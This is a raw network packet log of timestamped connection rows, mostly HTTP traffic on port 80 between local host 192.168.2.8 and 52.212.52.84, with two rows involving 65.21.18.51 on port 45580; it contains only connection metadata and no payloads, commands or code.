Sep 3, 2024 17:13:23.415451050 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.415478945 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.415478945 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.417058945 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.417072058 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.417083025 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.417123079 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.417170048 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.417344093 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.417361975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.417372942 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.417383909 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.417396069 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.417433977 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.507280111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.507296085 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.507308960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.507383108 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.507390976 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.507400036 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.507405996 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.507414103 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.507425070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.507440090 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.507473946 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.508106947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.508124113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.508136034 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.508147001 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.508163929 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.508172989 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.508173943 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.508188009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.508208990 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.508208990 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.508223057 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.508356094 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.508400917 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.508410931 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.508450985 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.508450985 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.508637905 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.508649111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.508658886 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.508670092 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.508690119 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.508723974 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.508960009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.509004116 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.509013891 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.509033918 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.509087086 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.509115934 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.509126902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.509138107 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.509154081 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.509213924 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.509308100 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.509367943 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.509831905 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.509843111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.509854078 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.509912968 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.509912968 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.509959936 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.509970903 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.509982109 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.509994984 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.510006905 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.510036945 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.510505915 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.510518074 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.510529995 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.510617971 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.510617971 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.510632038 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.510643005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.510653019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.510663033 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.510674000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.510679007 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.510718107 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.510924101 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.510936022 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.510946035 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.510957003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.510968924 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.510977030 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.510979891 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.511019945 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.511019945 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.511038065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.511038065 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.511082888 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.511142969 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.511153936 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.511159897 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.511177063 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.511188984 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.511198044 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.511209011 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.511223078 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.511234999 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.511616945 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.511627913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.511639118 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.511651039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.511671066 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.511672020 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.511688948 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.511699915 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.511703014 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.511712074 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.511720896 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.511727095 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.511739016 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.511750937 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.511763096 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.511765957 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.511765957 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.511782885 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.511787891 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.511795044 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.511811018 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.511815071 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.511825085 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.511826992 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.511841059 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.511851072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.511863947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.511873960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.511874914 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.511874914 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.511874914 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.511900902 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.511914015 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.512012959 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.512026072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.512079954 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.512121916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.512134075 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.512145996 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.512157917 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.512198925 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.512198925 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.512217999 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.512219906 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.512231112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.512243986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.512288094 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.512288094 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.512542009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.512553930 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.512564898 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.512608051 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.512644053 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.513114929 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.513127089 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.513138056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.513149023 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.513159990 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.513169050 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.513185024 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.513206005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.513206959 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.513216972 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.513227940 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.513238907 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.513256073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.513267994 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.513278008 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.513278008 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.513303041 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.513303041 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.513338089 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.513350010 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.513359070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.513370037 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.513381958 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.513422012 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.513422012 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.513422966 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.513581038 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.513735056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.513763905 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.513838053 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.513865948 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.513886929 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.515271902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.515281916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.515291929 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.515309095 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.515320063 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.515330076 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.515347004 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.515367031 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.515402079 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.515554905 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.515566111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.515621901 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.544832945 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:23.591264009 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:23.603976011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.603991985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.604007006 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.604054928 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.604054928 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.604077101 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.604085922 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.604096889 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.604121923 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.604121923 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.604125023 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.604137897 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.604139090 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.604173899 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.604787111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.604866028 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.604899883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.604913950 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.604913950 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.604948997 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.605004072 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.605504036 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.605514050 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.605525970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.605544090 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.605554104 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.605554104 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.605556011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.605592966 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.605612993 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.605623960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.605633974 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.605644941 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.605655909 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.605676889 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.605676889 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.605700970 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.605808973 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.605820894 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.605830908 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.605842113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.605854034 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.605866909 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.605866909 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.605917931 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.606271029 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.606281042 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.606307030 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.606332064 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.606467009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.606478930 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.606548071 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.606548071 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.606558084 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.606570005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.606580973 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.606594086 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.606605053 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.606616974 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.606616974 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.606638908 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.607243061 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.607254982 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.607265949 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.607307911 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.607307911 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.607321978 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.607332945 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.607342958 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.607353926 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.607372999 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.607372999 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.607445955 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.607458115 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.607470036 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.607498884 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.607498884 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.607592106 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.607604980 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.607688904 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.607707024 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.607722044 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.607733011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.607743025 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.607753038 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.607767105 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.607767105 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.607790947 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.607867002 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.608716011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.608731031 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.608742952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.608752966 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.608784914 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.608784914 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.608795881 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.608988047 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.608999968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609009981 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609021902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609040976 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.609040976 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.609054089 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.609082937 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.609100103 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609111071 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609121084 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609132051 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609148026 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.609148979 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609160900 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609168053 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.609174967 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609185934 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609191895 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.609205008 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.609209061 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609237909 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.609256029 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.609409094 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609421015 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609431028 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609440088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609451056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609462023 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609474897 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.609503984 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.609503984 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.609527111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609538078 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.609584093 CEST	49730	80	192.168.2.8	52.212.52.84
